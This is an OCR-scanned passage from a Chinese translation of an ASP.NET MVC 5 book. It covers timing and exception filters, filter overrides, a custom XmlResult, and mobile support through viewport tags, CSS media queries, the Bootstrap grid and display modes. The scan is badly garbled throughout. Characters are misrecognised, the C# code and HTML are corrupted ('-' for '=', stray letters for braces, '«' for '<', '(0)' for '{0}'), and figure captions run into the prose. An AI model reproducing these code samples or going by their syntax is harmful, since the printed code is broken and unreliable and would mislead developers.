返回 一 个 结果 。 它 也 重 写 了 OnResultExecuted 方 法 ， 这 样 它 可 以 “挽救 ”一 个 尚未 缓存 的 操作 
和 结果 的 执行 结果 。 

作为 一 个 示例 ， 让 我 们 看 一 下 ~/Areas/TimingFilter 中 的 代码 。 这 是 一 个 记录 操作 和 结果 
执行 时 间 的 操作 和 结果 过 滤器 ， 实 现 的 4 个 重 写 方法 如 下 所 示 : 
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public override void OnActionExecuting (ActionExecutingContext filterContext) 
i GetStopwatch ("action") .Start (); 

override void OnActionExecuted (ActionExecutedContext filterContext) 
: GetStopwatch ("action").Stop(); 
——————— filterContext) 
í GetStopwatch ("result").Start(); 

A override void OnResultExecuted (ResultExecutedContext filterContext) 
i var resultStopwatch = GetStopwatch ("result"); 

resultStopwatch.Stop(); 


var actionStopwatch = GetStopwatch ("action"); 
var response - filterContext.HttpContext.Response; 


if (!filterContext.IsChildAction && response.ContentType -- "text/html") 
response.Write( 
String.Format( 
"«h5»Action '(0) :: (1)', Execute: (2)ms, Result: (3)ms.«/h5»", 
filterContext.RouteData.Values["controller"], 
filterContext.RouteData.Values["action"], 
actionStopwatch.ElapsedMilliseconds, 
resultStopwatch.ElapsedMilliseconds 
) 
E 
) 
上 面 的 示例 中 使 用 NET 的 Stopwatch 类 的 两 个 实例 , 一 个 用 于 操作 执行 ; 另 一 个 用 于 结 
果 执 行 。 当 执行 完毕 时 ， 它 会 向 输出 流 中 追加 一 些 HTML 标 记 ， 以 使 我 们 能 够 精确 地 看 到 执 
行 代码 所 花费 的 时 间 。 


4. 异常 过 滤器 


可 利用 的 另 一 种 操作 过 滤器 是 异常 过 滤器 ， 用 来 处 理 操作 或 结果 执行 期 间 可 能 抛 出 的 异 
常 。 参 与 异常 处 理 的 操作 过 滤器 需要 实现 IExceptionFilter 接 口 。ASPNET MVC 框 架 只 提供 了 
一 个 异常 过 滤器 : [HandleError]. 

开发 人 员 经 常 使 用 异常 过 滤器 来 记录 错误 的 日 志 、 发 出 系统 管理 员 的 通知 以 及 从 最 终 用 户 
的 角度 选择 处 理 错误 的 方法 (通常 通过 给 用 户 发 送 错误 页 面 的 方式 ).HandleErrorAttribute 类 可 以 
做 上 述 最 后 的 操作 ， 因 此 通过 继承 HandleErrorAttribute 类 来 创建 异常 过 滤器 特性 是 非常 常见 
的 ， 当 然 创 建 的 新 特性 需要 重 写 OnException 方 法 以 在 调用 base.OnException 之 前 做 一 些 额外 
的 处 理 。 


5. 过 滤器 重 写 
最 后 一 种 过 滤器 是 MVC 5 中 新 增 的 过 滤器 类 型 。 与 其 他 过 滤器 不 同 的 是 ， 重 写 过 滤器 没 
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有 任何 方法 ， 而 只 是 返回 要 重 写 的 过 滤器 类 型 。 事 实 上 ， 不 把 重 写 过 滤器 看 成 普通 过 滤器 很 
有 帮助 。 它 们 实际 上 更 像 是 控制 其 他 类 型 的 过 滤器 应 该 在 什么 时 候 应 用 的 一 种 方式 。 

假设 有 一 个 在 应 用 程序 的 多 个 位 置 使 用 的 异常 过 滤器 ， 用 于 向 数据 库 中 记录 错误 信息 。 
但 是 ， 还 有 一 个 非常 敏感 的 操作 (假设 与 工资 名 单 相关 )， 我 们 不 希望 该 操作 的 错误 信息 显示 
在 数据 库 中 。 如 果 是 以 前 ,我们 有 两 个 选项 : 要 么 不 使 用 全 局 过 滤器 (将 异常 过 滤器 放 到 其 他 
每 个 控制 器 上 ， 以 及 控制 器 中 除了 工资 名 单 操作 以 外 的 其 他 每 个 操作 上 )， 要 么 定制 全 局 异常 
过 滤器 ， 使 其 知道 工资 名 单 操作 (这 样 ， 当 工资 名 单 操作 运行 时 ， 全 局 异常 过 滤器 就 可 以 跳 过 
自己 正常 的 逻辑 )。 这 两 种 方法 都 不 那么 吸引 人 。 在 MVC 5 中 ,我 们 可 以 为 异常 过 滤器 创建 一 
个 简单 的 重 写 过 滤器 ， 然 后 此 特性 应 用 到 操作 : 


public class OverrideAllExceptionFiltersAttribute : 
FilterAttribute, IOverrideFilter 


{ 
public Type FiltersToOverride 
t 
get ( return typeof(IExceptionFilter); } 
) 
) 


public static class FilterConfig 
{ 
public static void RegisterGlobalFilters( 
GlobalFilterCollection filters) 
{ 
filters.Add(new LogToDatabaseExceptionFilter()); 
) 
) 


[OverrideAllExceptionFilters] 
public ActionResult Payroll() 
t 

return View(); 
) 


注意 ”笔者 认为 System.Web Mvc 名 称 空间 中 的 内 容 太 多 了 ， 所 以 创建 了 一 
个 System .Web.Mvc .Filters 名 称 空间 , 并 把 许多 与 过 滤器 相关 的 新 类 型 放 到 了 该 名 
称 空间 中 。 如 果 找 不 到 某 个 新 过 滤器 类 型 ， 可 以 试 着 为 这 个 名 称 空间 添加 一 个 
Using 指令。 


再 看 另外 一 个 例子 。 假 设 我 们 有 一 个 全 局 cookie 身 份 验证 过 滤器 ， 但 是 有 一 个 返回 JSON 
的 操作 方法 , 并 且 该 方法 支持 不 记名 令 牌 身份 验证 。 我 们 不 希望 复杂 的 处 理 防伪 令 牌 的 情况 ， 
所 以 简单 地 为 不 记名 令 牌 身份 验证 添加 一 个 身份 验证 过 滤器 是 不 够 的 ， 因 为 两 个 身份 验证 过 
滤器 都 会 运行 。 我 们 需要 确保 操作 根本 不 使 用 cookie 进 行 身 份 验证 。 我 们 可 以 向 操作 添加 一 
个 过 滤器 重 写 来 阻止 所 有 全 局 和 控制 器 级 的 身份 验证 过 滤器 。 然 后 ， 只 允许 将 不 记名 令 牌 身 
份 验证 过 滤器 直接 放 到 操作 上 。 对 于 身份 验证 的 情况 ， 注 意 过 滤器 重 写 只 阻止 过 滤器 ， 而 不 
会 影响 其 他 任何 身份 验证 机 制 ， 比 如 服务 器 级 的 HITP 模 块 。 
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当 MVC 选 择 了 要 运行 的 操作 后 ， 就 会 获得 一 个 应 用 到 该 操作 的 过 滤器 列表 。MVC 在 构 
造 这 个 列表 的 时 候 ， 会 跳 过 在 比重 写 过 滤器 更 高 的 级 别 上 定义 的 任何 过 滤器 。 具 体 来 说 ， 把 
异常 过 滤器 重 写 放 到 控制 器 上 会 导致 VC 忽略 全 局 集合 中 的 所 有 异常 过 滤器 。 把 异常 过 滤器 
重 写 放 到 操作 上 会 导致 MVC 忽 略 全 局 集合 中 以 及 控制 器 上 的 所 有 蜡 常 过 滤器 。 当 操作 运行 
时 ，MVC 会 认为 重 写 的 过 滤器 不 存在 ， 因 为 在 MVC 用 来 运行 该 操作 的 管道 的 列表 中 ， 不 包 
含 这 些 过 滤器 。 
如 前 面 的 代码 段 所 示 ， 重 写 过 滤器 会 返回 要 重 写 的 过 滤器 类 型 。 这 里 支持 的 类 型 仅 包 含 
其 他 过 滤器 接口 类 型 (IActionFilter、IAuthenticationFilter、IAuthorizationFilter、IExceptionFilter 
和 IResultFilter)， 并 不 支持 返回 具体 过 滤器 类 或 基 类 的 类 型 。 使 用 过 滤器 重 写 时 ,会 重 写 一 个 
类 型 的 所 有 过 滤器 (如 果 该 类 型 位 于 更 高 的 级 别 上 )。 如 果 只 想 重 写 某 些 更 高 级 别 的 过 滤器 ， 
就 需要 手动 执行 这 些 工 作 。 例 如 ， 如 果 我 们 有 多 个 全 局 操作 过 滤器 ， 只 想 在 控制 器 上 重 写 其 
中 的 一 个 ， 就 可 以 添加 一 个 特性 来 重 写 所 有 操作 过 滤器 ， 然 后 为 想 要 保留 的 特定 操作 过 滤器 


人 注意 ， 如 果 只 有 5 个 可 以 重 写 的 过 滤器 类 型 ， 为 什么 不 直接 提供 5 个 过 滤器 
重 写 特性 呢 ? 笔者 尝试 为 MVC 和 Web API 添 加 过 滤器 重 写 特性 来 实现 这 种 想法 。 
| TEUER S 甚至 可 以 发 现 OverrideExceptionFiltersAttribute 这 样 的 类 .针对 Web API 
的 过 滤器 重 写 特性 工作 得 很 好 。 但 是 ， 对 于 MVC， 笔 者 忘 了 让 这 些 特性 继承 
| FilterAttribute， 而 是 让 它们 继承 了 Attribute。 所 以 MVC 5 中 直接 提供 的 过 滤器 重 
| ”号 特 性 并 不 能 工作 (从 技术 上 说 , 它们 在 全 局 范围 内 可 以 工作 , 不 过 这 没什么 用 )。 
| “我们 在 MVC 5.1 中 解决 了 这 个 问题 ， 但 是 对 于 MVC 5.0， 开 发 人 员 需 要 自己 定义 
| ”过滤 器重 写 特性 。 


15.3.3 ”提供 自 定义 结果 


大 部 分 操作 方法 的 最 后 一 行 代码 都 会 返回 一 个 操作 结果 对 象 。 例 如 ，Controller 类 上 的 
View 方 法 返回 ViewResult 的 一 个 实例 ， 其 中 包含 查找 视图 的 必要 代码 ， 执 行 该 结果 并 将 执行 
结果 写 入 到 响应 流 中 。 当 在 操作 方法 中 编写 “retum View0;” 时 ， 就 是 请 求 ASPNET MVC 框 架 
自动 执行 一 个 视图 结果 。 

作为 一 名 开发 人 员 ， 我 们 不 能 仅 限 于 ASPNET MVC 框 架 提供 的 操作 结果 。 我 们 可 以 通 
过 继承 类 ActionResult 并 实现 其 中 的 ExecuteResult 方 法 来 编写 自己 的 操作 结果 。 


为 什么 要 有 操作 结果 ? 
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我 们 可 能 会 问 自己 ASPNET MVC 为 什么 总 是 有 操作 结果 呢 。 难 道 不 能 让 Controller 类 知 
道 如 何 泻 染 视图 ， 让 它 的 View 方 法 进行 演 染 吗 ? 
前 两 章 介 绍 了 一 些 相关 主题 : 依赖 注入 和 单元 测试 。 这 些 章节 都 谈 到 了 和 良好 软件 设计 的 
重要 性 。 这 种 情况 下 ， 操 作 结 果 起 到 了 非常 重要 的 作用 : 
e ”Controller 类 是 提供 了 方便 性 ， 但 它 不 是 ASPNETMVC 框 架 的 核心 部 分 。 从 ASPNET MVC 
运行 时 的 角度 来 看 ， 重 要 的 类 型 是 IController; 我 们 只 需要 理解 它 是 ASPNETMVC 


第 15 章 扩展 ASPNET MVC 


中 的 控制 器 或 使 用 ASPNET MVC 中 的 控制 器 即 可 。 所 以 明显 的 是 ， 把 泻 染 的 视图 
逻辑 放 入 Controller 类 中 将 会 使 在 其 他 地 方 重用 该 逻辑 更 加 困难 。 此 外 ， 不 管 泻 染 视 
图 是 不 是 控制 器 的 工作 ， 它 都 必须 知道 如 何 泻 染 视 图 吗 ? 这 里 使 用 的 原则 是 单一 
职责 原则 (Single Responsibility Principle)。 控 制 器 应 该 只 集中 于 必要 的 操作 。 

e ”我 们 希望 在 整个 框架 中 启用 好 的 单元 测试 。 通 过 使 用 操作 结果 类 ， 我 们 可 以 使 开 
发 人 员 编 写 能 够 直接 调用 操作 方法 的 单元 测试 ， 还 可 以 检查 操作 结果 的 返回 值 。 
相对 于 从 泻 染 视 图 可 能 生成 的 HTML 中 挑选 来 说 ， 对 一 个 操作 结果 的 参数 进行 单 
元 测试 还 是 要 简单 很 多 。 


在 有 关 ~/Areas/CustomActionResult 的 示例 中 ， 我 们 有 一 个 XML 操作 结果 类 ， 用 来 将 一 个 
对 象 序列 化 为 XMI 格 式 表 示 ， 并 把 它 作为 响应 发 送 给 客户 端 。 在 完整 的 示例 代码 中 ， 我 们 有 
一 个 在 控制 器 内 被 序列 化 的 自 定义 Person 类 : 
public ActionResult Index() { 
var model = new Person ( 
FirstName - "Brad", 


LastName = "Wilson", 
Blog - "http://bradwilson.typepad.com" 


}; 


return new XmlResult (model); 
} 


XmlResult 类 的 实现 依赖 于 .NET 框 架 内 置 的 XML 序 列 化 能 


public class XmlResult : ActionResult { 
private object data; 


public xmlResult (object data) { 
this.data = data; 


} 


public override void ExecuteResult (ControllerContext context) { 
var serializer = new XmlSerializer (data.GetType()); 
var response = context.HttpContext.Response.OutputStream; 


context.HttpContext.Response.ContentType - "text/xml"; 
serializer.Serialize(response, data); 
) 
$ 


15.44 小 结 


本 章 介 绍 了 ASPNET MVC 框 架 中 的 一 些 高 级 扩展 。 根 据 它们 扩展 的 目标 是 模型 、 视 图 
还 是 控制 器 (和 操作 )， 可 以 把 这 些 扩展 大 致 分 为 三 类 。 对 于 模型 ， 我 们 应 该 理解 值 提供 器 和 
模型 绑 定 器 的 内 部 工作 原理 ， 掌 握 如 何 通 过 使 用 模型 元 数据 和 模型 验证 器 来 扩展 ASPNET 
MVC 处 理 模型 编辑 的 方式 。 视图 扩展 部 分 介绍 了 如 何 自 定义 视图 引擎 来 提供 自己 定位 视图 文 
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件 的 规则 ， 同 时 也 讲解 了 在 视图 中 生成 HTML 标记 辅助 方法 的 两 个 变 体 。 最 后 ， 我 们 通过 使 
操作 选择 器 、 操 作 过 滤器 和 自 定义 操作 结果 类 型 学 习 了 控制 器 扩展 ， 它 为 设计 独特 的 连接 
模型 和 视图 的 操作 提供 了 强大 而 灵活 的 方法 。 这 些 扩展 可 以 帮助 我 们 把 ASPNET MVC 应 用 程 
序 的 功能 和 重用 性 提升 到 更 高 一 级 的 水 平 ， 同 时 也 使 得 ASPNET MVC 应 用 程序 更 容易 理解 、 
调试 和 增强 。 


e 移动 支持 

e 高 级 Razor 特 性 

e 使 用 视图 引擎 

e 理解 及 定制 基 架 
. 
. 
. 


高 级 路 由 
定制 模板 
高 级 控制 器 


在 前 面 介绍 ASPNET MVC 基 础 内 容 时 ， 为 了 避免 迷失 方向 ， 我 们 对 许多 非常 “ 酷 ” 的 高 
级 主题 都 是 一 笔 带 过 。 但 是 ， 现 在 是 我 们 学 习 它们 的 时 候 了 。 


本 章 代码 下 载 : 
本 章 所 有 代码 以 NuGet 包 的 形式 提供 。NuGet 代 码 示例 在 每 个 应 用 程序 节 的 末尾 清晰 指 
明 。 从 以 下 网 址 可 下 载 这 些 NuGet 包 : http://www.wrox.com/go/ proaspnetmvc5 o 


16.1 移动 支持 


使 用 移动 设备 浏览 网 站 现在 变 得 越 来 越 普 遍 。 一 些 估计 显示 ， 移 动 设备 占 网 络 流量 的 
30%， 并 在 逐年 攀升 。 网 站 能 够 在 移动 设备 上 使 用 和 浏览 显得 越 来 越 重 要 。 

目前 有 各 种 各 样 的 方法 可 以 提高 网 站 应 用 程序 的 移动 体验 。 在 某 些 情况 下 ， 我 们 只 是 想 
在 小 规格 上 做 一 些微 小 的 风格 变化 。 在 其 他 一 些 情况 下 ， 我 们 可 能 完全 改变 外 观 显 示 或 者 一 
些 视 图 的 内 容 。 在 最 极端 的 情况 下 (在 移动 Web 程 序 迁 移 到 本 地 移动 程序 之 前 ), 我 们 可 能 想 重 
新 创建 一 个 专门 针对 移动 用 户 的 Web 应 用 程序 。 针 对 这 些 情况 ，MVC 提 供 了 如 下 两 种 方案 : 

e 适应 性 呈现 : 默认 选项 ， 基 于 Bootstrap 的 应 用 程序 模板 使 用 CSS 媒 体 查询 (CSS media 

queries) 来 缩小 到 较 小 的 移动 规格 。 
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e 显示 模式 : MVC 采 用 了 基于 约定 的 方法 ， 这 样 就 可 以 根据 发 出 请 求 的 浏览 器 选择 不 
同 视图 。 与 适应 性 呈现 不 一 样 的 是 ， 显 示 模 式 允许 我 们 改变 发 往 移动 浏览 器 的 标记 。 


移动 设备 模拟 器 
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本 节 的 截屏 使 用 Windows Phone Emulator， 它 包含 在 Windows Phone SDK 中 。Windows 
Phone SDK 包 含 在 Visual Studio 2013 中 ， 也 可 从 以 下 网 址 单独 下 载 : https://dev. 
windowsphone.com/en-us/downloadsdk。 

笔者 鼓励 尝试 其 他 一 些 移 动 设备 模拟 器 ， 比 如 Opera Mobile Emulator( 下 载 网 址 为 
http://www.opera.com/developer/tools/mobile/)， 或 针对 让 hone 和 iPad 浏 览 器 的 Electric Plum 
Simulator( 下 载 网 址 为 http://www.electricplum.com)。 


16.1.1 适应 性 呈现 


改善 网 站 移动 体验 的 第 一 步 是 在 移动 浏览 器 中 浏览 
网 站 。 图 16-1 展 示 了 在 移动 设备 上 查看 时 ，MVC 3 默认 
模板 的 主页 。 

图 中 展示 的 外 观 中 存在 很 多 问题 : 

e 在 默认 缩放 级 别 上 ， 大 量 文本 的 可 读 性 比较 差 。 

e 标题 中 的 导航 链接 无 法 使 用 。 

e 缩放 没有 真正 起 到 作用 ， 由 于 内 容 不 回流 , 我 们 

只 能 浏览 页 面 的 一 小 部 分 。 

这 仅 是 简单 罗列 了 一 个 简单 页 面 。 

幸好 ， 自 从 MVC 4 添加 了 一 些 自 定义 的 HTML 和 
CSS 以 来 ，MVC 的 项 目 模板 已 经 有 了 很 大 改进 。 这 些 自 
定义 的 HTML 和 CSS 利 用 了 我 们 稍 后 就 将 介绍 的 浏览 器 
功能 。MVC 5 则 更 进一步 ， 让 项 目 模 板 基 于 Bootstrap 框 
架 。Bootstrap 十 分 重视 能 够 在 移动 设备 上 工作 良好 ， 以 
至 于 Bootstrap 3( 随 MVC 5 发 布 的 版 本 ) 将 自己 称 为 “Web 
上 移动 优先 的 项 目 ” 的 模板 。 当 然 ， 我 们 肯定 可 以 使 用 图 16-1 
Bootstrap 3 创建 针对 宽屏 桌面 显示 的 出 色 的 Web 应 用 程 
序 (如 本 书 中 的 例子 )， 不 过 对 于 移动 友好 的 布局 ，Bootstrap 3 不 只 是 支持 它们 ， 更 把 它们 视 为 
了 第 一 要 务 。 
因此 ， 不 需要 我 们 做 额外 的 工作 ，MVC 5 应 用 程序 就 可 以 在 移动 浏览 器 中 表现 得 很 好 ， 
如 图 16-2 所 示 。 
显而易见 ， 图 16-2 中 的 页 面 智能 地 根据 移动 设备 屏幕 尺寸 进行 缩放 ， 而 不 是 简单 地 缩小 
页 面 (收缩 文本 及 其 他 所 有 元 素 )。 为 了 能 在 移动 设备 上 使 用 ， 页 面 进行 了 重 绘 。 

不 明显 的 是 ， 为 了 针对 新 尺寸 进行 优化 ， 页 面 布局 在 小 尺寸 上 进行 了 微妙 调整 。 例 如 ， 
标题 区 导航 从 5 个 单独 的 文本 链接 收缩 成 了 一 个 下 拉 菜 单 ， 如 图 16-3 所 示 。 
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ASP.NET 


ASP.NET is a free web 
framework for building great 
Web sites and Web applications 
using HTML, CSS and 
JavaScript 


Learn more » Confirm password. 


Register 


Getting started 


62014 - My ASP.NET Application 


人 [EC 一 


ASP.NET MVC gives you a power, pate ms. 
based way to build. 


@ iocalhost32725 


图 16-2 图 16-3 


向 下 滚动 ， 我 们 就 会 看 到 其 他 使 页 面 紧 凑 的 简化 移动 视图 ， 这 样 就 可 以 最 大 限度 地 利用 
屏幕 。 虽 然 这 些 变化 都 是 细微 的 ， 但 它们 的 影响 却 是 巨大 的 。 例 如 ，Register 视 图 中 显示 的 表 
单 输 入 框 ( 见 图 16-3) 的 大 小 就 被 恰当 设置 ， 适 合 在 移动 设备 上 进行 触摸 输入 。 

这 些 模板 就 是 通过 适应 性 呈现 实现 根据 页 面 宽度 自动 调整 页 面 大 小 。 请 注意 ， 这 里 不 
是 说 应 用 程序 根据 标题 或 其 他 线索 猜测 用 户 是 否 使 用 移动 设备 来 对 页 面 进行 缩放 。 恰 恰 相 
Bo 页面 利用 的 是 两 个 普遍 支持 的 浏览 器 功能 ;Viewport 元 标记 (Viewport meta tag) 和 CSS 
媒体 查询 。 


1. Viewport 元 标记 


创建 的 大 部 分 网 页 都 没有 考虑 到 在 小 规格 屏幕 上 如 何 显示 ， 为 了 很 好 地 显示 这 些 页 面 ， 
移动 浏览 器 已 经 努力 了 很 长 时 间 。 主 要 关注 于 i 看 义 结构 内 容 设计 的 网 站 可 以 考 虐 格 式 化 ， 而 
使 这 些 文本 具有 可 读 性 ， 但 那些 刚性 视觉 导向 设计 的 网 站 就 没 那么 幸运 了 ， 这 些 网 站 需要 用 
缩放 和 平移 来 处 理 。 

由 于 多 数 网 站 不 能 很 好 地 扩展 ， 因 此 移动 浏览 器 通常 在 推测 如 何 安全 地 演 染 通常 失败 的 
页 面 , 并 使 用 缩放 和 平移 风格 进行 泻 染 。 解决 这 个 问题 的 方法 是 告诉 浏览 器 我 们 的 设计 尺寸 ， 
让 它 不 要 推测 。 

通常 情况 下 ， 基 于 浏览 器 嗅 探 或 用 户 选择 ，Viewport 标 记 只 在 那些 专门 为 小 规格 设计 的 
页 面 中 使 用 。 这 种 情况 下 ， 我 们 按 如 下 方式 使 用 Viewport 标 记 


«meta name-"viewport" content="width=320"> 

这 样 就 可 适用 于 移动 视图 ， 但 不 适用 于 大 尺寸 页 面 。 

一 个 更 好 的 解决 方案 是 把 我 们 的 CSS 扩 展 到 各 种 规模 ( 稍 后 介绍 )， 然 后 告诉 浏览 
Viewport 支 持 任意 设备 。 可 喜 的 是 ， 这 种 方案 非常 容易 实现 。 
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«meta name-"viewport" content-"width-device-width, initial-scale-1.0"» 


2. 使 用 CSS 媒体 查询 的 自 适应 样式 


我 们 已 经 告诉 浏览 器 ， 我 们 的 页 面 足够 智能 ， 可 以 缩放 到 当前 设备 的 屏幕 尺寸 。 这 是 一 
个 大 胆 承诺 ! 我 们 将 如 何 兑现 这 一 承诺 呢 ? 答案 是 CSS 媒 体 查 询 。 

CSS 媒 体 查 询 允 许 我 们 在 特定 的 媒体 (显示 ) 功 能 指定 CSS 规 则 。 下 面 内 容 摘 自 W3C Media 
Queries 文 档 : 


目前 ，HTML4 和 CSS2 支 持 与 媒体 相关 的 样式 表 ， 这 些 样式 表 专 为 不 同 的 媒体 类 型 制作 。 
例如 , 一 个 文件 可 能 在 屏幕 上 显示 时 使 用 sans-serif 字 体 , 使 用 打印 机 打印 时 使 用 serif 字 体 。“ 屏 
幕 ” 和 “打印 ”是 已 经 定义 的 两 种 不 同 媒体 类 型 。 媒 体 查 询 通过 使 用 更 精确 的 样式 表 标 签 扩 
展 了 媒体 类 型 的 功能 。 
媒体 查询 由 一 个 媒体 类 型 和 零 个 或 多 个 检查 特定 媒体 功能 条 件 的 表达 式 组 成 。 在 这 些 媒 
体 功能 中 ， 能 在 媒体 查询 中 使 用 的 功能 有 'width'"，'height' 和 'color。 通 过 使 用 媒体 查询 ， 演 示 
文稿 可 在 不 改变 自身 内 容 的 情况 下 适用 于 特定 范围 的 输出 设备 。 
— —http://www.w3.org/TR/css3-mediaqueries/ 


尽管 我 们 在 CSS2 中 可 以 使 用 目标 媒体 类 型 ， 比 如 屏幕 和 打印 , 但 是 我 们 可 以 在 媒体 查询 
中 指定 屏幕 显示 的 宽度 范围 。 

请 记 住 ，CSS 规 则 进行 自 上 而 下 的 评估 ， 这 样 我 们 就 可 以 在 CSS 文 件 的 顶部 应 用 一 般 的 
规则 ， 并 且 可 以 用 专门 在 CSS 中 进行 小 规格 显示 的 规则 进行 重 写 ， 并 用 媒体 查询 环绕 这 些 规 
则 ， 以 使 它们 不 能 在 大 规格 显示 的 浏览 器 中 使 用 。 

下 面 列举 一 个 非常 简单 的 示例 ， 当 在 宽度 大 于 768px 的 屏幕 上 显示 时 ,背景 是 蓝 色 ; 当 在 
宽度 小 于 768px 的 屏幕 上 显示 时 ， 背 景 是 红色 : 

body (background-color:blue;] 


(media only screen and (max-width: 768px) ( 
body (background-color:red;]) 


) 


这 段 代 码 使 用 了 max-width 查 询 , 所 以 假定 默认 设置 是 宽屏 (桌面 ) 显 示 , 然后 对 小 于 768px 
的 显示 做 了 一 些 调整 。 因 为 Bootstrap 3 被 设计 为 “移动 优先 ”的 框架 ， 所 以 情况 刚好 相反 ， 
需要 使 用 min-width 查 询 。 默认 的 CSS 规 则 假定 采用 移动 设备 宽度 ， 当 在 更 宽 的 屏幕 上 显示 时 ， 
min-width 媒 体 查 询 就 会 应 用 额外 的 格式 设置 。 

想 查 看 这 些 媒体 查询 的 示例 ， 请 打开 /Contentbootstrap.css 并 搜索 @media。 


媒体 查询 : 为 什么 在 第 一 个 就 停止 
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在 我 们 网 站 的 CSS 中 ， 我 们 可 以 使 用 各 种 媒体 查询 来 确保 网 站 在 各 种 屏幕 尺寸 上 以 美观 
的 形式 显示 ， 从 狭小 的 手机 浏览 器 到 巨大 的 宽屏 显示 器 ， 以 及 二 者 之 间 的 所 有 尺寸 设备 。 网 
站 http:/mediaqueri.es/ 提 供 的 站 点 库 ， 显 示 这 种 方法 的 强大 作用 。 

检查 Bootstrap CSS 会 发 现 , 它 使 用 min-width 和 max-width 查 询 对 中 等 大 小 的 显示 尺寸 提供 
了 额外 的 支持 :@media (min-width: 992px) 和 (max-width: 1199px)。 


如 果 细心 ， 我 们 就 会 想到 在 桌面 上 把 浏览 器 宽度 调整 到 低 于 768px 来 测试 MVC 模 板 中 的 
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媒体 查询 支持 (如 图 16-4 所 示 )， 这 个 想法 是 正确 的 。 
€ o Er Er 


ASP.NET 


ASP NET is a free web framework for building great Web sites and Web applications using 
HTML, CSS and JavaScript 


Getting started 


ASP.NET MVC gives you a powerful, patterns-based way to build dynamic websites that enables a clean separation 
of concerns and gives you full control over markup for enjoyable, agile development 


Learn more » 


Get more libraries 


NuGet is a free Visual Studio extension that makes it easy to add, remove, and update libraries and tools in Visual 
Studio projects 


Learn more » 


Web Hosting 


You can easily find a web hosting company that offers the right mix of features and price for your applications. 


图 16-4 
为 了 方便 比较 ， 图 16-5 显 示 了 将 同一 个 浏览 器 窗口 放大 到 超过 768px 时 的 情形 。 
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我 们 可 以 很 容易 地 测试 这 一 功能 ， 而 不 用 编写 任何 代码 : 创建 一 个 MVC 5 项 目 ， 运 行 ， 
然后 调整 浏览 器 大 小 。 


3. 使 用 Bootstrap 进行 响应 性 Web 设计 


我 们 已 经 看 到 ， 在 创建 一 个 站 点 ， 使 其 在 所 有 规格 下 都 可 以 很 好 工作 的 时 候 ， 适 应 性 布 
局 (使 用 媒体 查询 来 为 不 同 的 屏幕 宽度 应 用 不 同 的 CSS 样 式 ) 十 分 有 用 。 适 应 性 布局 属于 所 谓 的 
响应 性 Web 设 计 ， 也 就 是 在 一 系列 设备 上 优化 浏览 体验 的 一 种 方法 。 响 应 性 Web 设 计 还 处 理 
其 他 一 些 关 注 点 ， 例 如 流 式 网 格 (能 够 智能 地 基于 屏幕 尺寸 重新 排列 内 容 的 位 置 ) 和 图 像 缩 放 。 
Bootstrap 为 这 些 应 用 提供 了 广泛 的 支持 ， 并 为 移动 设备 提供 了 一 些 CSS 实 用 工具 类 。 

在 管理 各 种 屏幕 尺寸 上 的 复杂 布局 时 ，Bootstrap 3 的 网 格 系统 十 分 有 用 。 网 格 系统 将 屏 
幕 宽 度 分 为 12 栏 ， 然 后 允许 我 们 根据 屏幕 尺寸 ， 指 定 网 格 元 素 应 该 占据 多 少 栏 。 

e 极 小 : <768px 

e 小 : 三 768px 

e H&E: 宇 992px 

e 大 : 三 1200px 

例如 ， 下 面 的 HTML 在 移动 设备 上 为 每 个 元 素 指定 6 栏 (网 格 宽度 的 一 半 )， 但 在 更 大 的 显 
示 屏 幕 上 为 每 个 元 素 指定 4 栏 (网 格 宽度 的 1/3): 


«div class="row"> 
«div class-"col-xs-6 col-md-4"».col-xs-6 .col-md-4«/div» 
«div class-"col-xs-6 col-md-4"».col-xs-6 .col-md-4«/div» 
<div class-"col-xs-6 col-md-4"».col-xs-6 .col-md-4«/div» 
«/div» 
Bootstrap 网 站 详细 介绍 了 Bootstrap 网 格 系统 ， 并 提供 了 大 量 示例 。 其 网 址 为 : 
http://getbootstrap.com/css/#grid。 
在 前 面 的 技术 中 ， 我 们 向 每 个 浏览 器 发 送 同样 的 标记 ， 使 用 CSS 可 以 改换 或 触发 指定 元 
素 的 样式 。 在 某 些 应 用 中 ， 这 是 远 远 不 够 的 ， 我们 需要 改变 发 送 到 所 有 移动 浏览 器 的 标记 。 
这 是 显示 模式 的 用 武之 地 。 


16.1.2 显示 模式 


MVC 5 中 的 视图 选择 逻辑 包含 基于 约定 的 替代 视图 。 当 浏览 器 用 户 代理 显示 是 一 个 已 知 
的 移动 设备 时 ， 默 认 的 视图 引擎 首先 查找 名 称 以 Mobile.cshtml 结 尾 的 视图 。 例 如 ， 当 桌面 浏 
览 器 请 求 主页 时 ， 应 用 程序 就 用 Views\Home\Index.cshtml 模 板 ， 而 当 移动 浏览 器 请 求 主页 时 ， 
程序 就 会 使 用 Views\Home\Index.Mobile.cshtml 模 板 ， 而 不 使 用 桌面 视图 。 这 些 都 由 约定 来 处 
理 。 我 们 不 必 配 置 或 注册 。 

为 了 测试 这 一 功能 ， 我 们 首先 创建 一 个 MVC 5 应 用 程序 。 然 后 复制 \Views\Home\ 
Index.cshtml 模 板 ， 在 解决 方案 资源 管理 器 (Solution Exploren) 中 选中 \Views\Home\Index.cshtml 
模板 ， 按 快捷 键 CtlHC， 再 按 快 捷 键 Ctl+V。 并 将 这 个 视图 重 命名 为 Index.Mobile cshtml， 这 
时 就 出 现 了 \Views\Home 目 录 ， 如 图 16-6 所 示 。 

编辑 Index.Mobile.cshtml 视 图 ， 例 如 修改 “jumbotron” 部 分 的 内 容 : 


«div class-"jumbotron"» 
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Xh1»WELCOME, VALUED MOBILE USER!«/h1» 
<p class-"lead"»This content is only shown to mobile browsers.«/p» 
«/div» 


运行 应 用 程序 ， 在 移动 模拟 器 中 查看 新 视图 ， 如 图 16-7 所 示 。 
1. 布局 和 部 分 视图 支持 


也 可 以 创建 布局 和 部 分 视图 模板 的 移动 版 本 。 

如 果 Views\Shared 文 件 夹 中 包含 Layout.cshtml 和 _Layoutmobile.cshtml 模 板 ， 那 么 在 默认 
情况 下 ， 应 用 程序 会 对 来 自 移动 浏览 器 的 请 求 使 用 Layout mobile.cshtml 模 板 ， 对 其 他 的 请 求 
使 用 Layout.cshtml ifi - 


I Solution WebApplicationT (1 project) 
lebApplicationt 


pw 
EETA WELCOME, 
i-re VALUED 
D S Content MOBILE 
Iren USER! 
i = pes This content is only shown to 
4 & Views mobile browsers. 


4 & Home 
tw) About.cshtml 
10) Contact.cshtml 


I deren 
Getting started 
DICES) 
1) ViewStart.cshtml ASP.NET MVC gives you a powerful, patterns- 
F Web.config based way to build dynamic websites that 


B faviconico ed 
pem S 
内 packages.config 

D) Project Readme.htm! 
站 Web.config 


图 16-6 图 16-7 


